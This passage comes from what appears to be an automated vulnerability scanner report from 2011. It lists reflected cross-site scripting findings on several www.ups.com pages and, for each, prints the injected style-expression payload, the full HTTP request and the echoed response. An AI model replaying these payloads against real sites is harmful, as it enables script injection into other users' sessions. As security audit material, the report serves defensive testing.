<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc2732"style="x:expression(alert(1))"04a1cbd1897/index.jsx">
...[SNIP]...

1.54. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad was submitted in the REST URL parameter 2. This input was echoed as 8c56a"style="x:expression(alert(1))"c7ff244ebad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad/en/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8c56a"style="x:expression(alert(1))"c7ff244ebad/en/locations/alliances/index.html">
...[SNIP]...

1.55. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a was submitted in the REST URL parameter 3. This input was echoed as 66bf6"style="x:expression(alert(1))"eb049b5ef2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en66bf6"style="x:expression(alert(1))"eb049b5ef2a/locations/alliances/index.html">
...[SNIP]...

1.56. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f was submitted in the REST URL parameter 2. This input was echoed as 9a18c"style="x:expression(alert(1))"85469569a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f/en/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9a18c"style="x:expression(alert(1))"85469569a7f/en/locations/aso/index.html">
...[SNIP]...

1.57. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5 was submitted in the REST URL parameter 3. This input was echoed as 71006"style="x:expression(alert(1))"fb54cd13bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en71006"style="x:expression(alert(1))"fb54cd13bc5/locations/aso/index.html">
...[SNIP]...

1.58. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606 was submitted in the REST URL parameter 2. This input was echoed as 992bd"style="x:expression(alert(1))"fc1c542d606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606/en/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us992bd"style="x:expression(alert(1))"fc1c542d606/en/locations/custcenters/index.html">
...[SNIP]...

1.59. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84cea"style%3d"x%3aexpression(alert(1))"fabf1550216 was submitted in the REST URL parameter 3. This input was echoed as 84cea"style="x:expression(alert(1))"fabf1550216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en84cea"style%3d"x%3aexpression(alert(1))"fabf1550216/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en84cea"style="x:expression(alert(1))"fabf1550216/locations/custcenters/index.html">
...[SNIP]...

1.60. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3 was submitted in the REST URL parameter 2. This input was echoed as 3203e"style="x:expression(alert(1))"21d9c88cca3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3203e"style="x:expression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html">
...[SNIP]...

1.61. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c was submitted in the REST URL parameter 3. This input was echoed as e791a"style="x:expression(alert(1))"af78a44ca5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ene791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ene791a"style="x:expression(alert(1))"af78a44ca5c/locations/dropboxes/index.html">
...[SNIP]...

1.62. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0680"style%3d"x%3aexpression(alert(1))"8203c807817 was submitted in the REST URL parameter 2. This input was echoed as f0680"style="x:expression(alert(1))"8203c807817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf0680"style%3d"x%3aexpression(alert(1))"8203c807817/en/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf0680"style="x:expression(alert(1))"8203c807817/en/locations/store/index.html">
...[SNIP]...

1.63. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a was submitted in the REST URL parameter 3. This input was echoed as a7ad9"style="x:expression(alert(1))"f95a058444a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena7ad9"style="x:expression(alert(1))"f95a058444a/locations/store/index.html">
...[SNIP]...

1.64. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af was submitted in the REST URL parameter 2. This input was echoed as ad5e0"style="x:expression(alert(1))"5145468c0af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af/en/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usad5e0"style="x:expression(alert(1))"5145468c0af/en/myups/billing/index.html">
...[SNIP]...

1.65. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a57c4"style%3d"x%3aexpression(alert(1))"88004cee062 was submitted in the REST URL parameter 3. This input was echoed as a57c4"style="x:expression(alert(1))"88004cee062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena57c4"style%3d"x%3aexpression(alert(1))"88004cee062/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena57c4"style="x:expression(alert(1))"88004cee062/myups/billing/index.html">
...[SNIP]...

1.66. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e was submitted in the REST URL parameter 2. This input was echoed as cd044"style="x:expression(alert(1))"8605e8dd69e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/uscd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/uscd044"style="x:expression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html">
...[SNIP]...

1.67. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01d3"style%3d"x%3aexpression(alert(1))"63752b625b4 was submitted in the REST URL parameter 3. This input was echoed as d01d3"style="x:expression(alert(1))"63752b625b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/end01d3"style%3d"x%3aexpression(alert(1))"63752b625b4/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/end01d3"style="x:expression(alert(1))"63752b625b4/myups/mgmt/index.html">
...[SNIP]...

1.68. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac was submitted in the REST URL parameter 2. This input was echoed as ab43b"style="x:expression(alert(1))"d5a4fd981ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac/en/register/help/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usab43b"style="x:expression(alert(1))"d5a4fd981ac/en/register/help/index.html">
...[SNIP]...

1.69. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f was submitted in the REST URL parameter 3. This input was echoed as 3b516"style="x:expression(alert(1))"bdd9fbd3d6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en3b516"style="x:expression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav">
...[SNIP]...

1.70. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e was submitted in the REST URL parameter 2. This input was echoed as 7ae54"style="x:expression(alert(1))"37c623b859e in the application's response.

